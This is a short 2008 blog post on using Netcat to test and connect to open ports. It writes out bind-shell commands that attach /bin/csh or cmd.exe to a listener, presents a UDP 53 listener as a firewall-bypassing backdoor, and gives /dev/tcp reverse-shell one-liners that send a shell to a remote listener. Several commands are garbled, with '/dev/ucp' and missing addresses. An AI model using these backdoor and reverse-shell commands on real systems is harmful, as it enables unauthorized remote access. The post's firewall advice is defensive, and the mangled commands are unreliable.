Thursday, 31 July 2008

Testing and making connections to open ports with Netcat

  • Faster than a speeding Telnet.
  • Easy to drop with a CTRL-C
  • Handles raw data in a single bound

Yes it not a bird or a plane, it is netcat.

Netcat is far faster than Telnet without the overhead and translation. This makes it superior for forensic data transfers. Unlike Telnet, netcat does not add characters.

Next, Netcat can connect over UDP. This means it can be used as a simple "Telnet" client and server - even over UDP.

On the Server:
# nc -l -p [port] -e /bin/csh
C:\ nc -l -p [port] -e C:\windows\cmd.exe

So if the aim is to have a UDP "telnet" style client over UDP 53, just run:
# nc -l -u -p 53 -e /bin/csh

Can we say a simple backdoor.

On the Client:
# nc [ServerIPAddress] [port]

So to connect to the listener above on UDP 53 at IP address we would use:
# nc -u 53

It is all really easy when you think about it. This is why it is SO EASY to bypass firewalls and routers that allow DNS traffic (or any default rules). This is why it is CRITICAL that there are restrictions on all rules that have ANY system to ANY system access.

Opps - I forgot to install netcat...

More on this later, but for our netcat client on a system when we can not install netcat, there is both /dev/TCP and /dev/UDP

  • /dev/tcp/[IPaddress]/[port]
  • /dev/ucp/[IPaddress]/[port]

So for our UDP 53 example this becomes:

  • /dev/ucp/

For the shell this becomes:

  • /bin/csh –i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1
  • /bin/csh –i > /dev/ucp/[IPaddress]/[port] 0<&1 2>&1

And hence:

  • /bin/csh –i > /dev/ucp/ 0<&1 2>&1

Shovels a shell from the target host to waiting Netcat listener. We can enter commands on the host that act as a reverse shell.

No comments: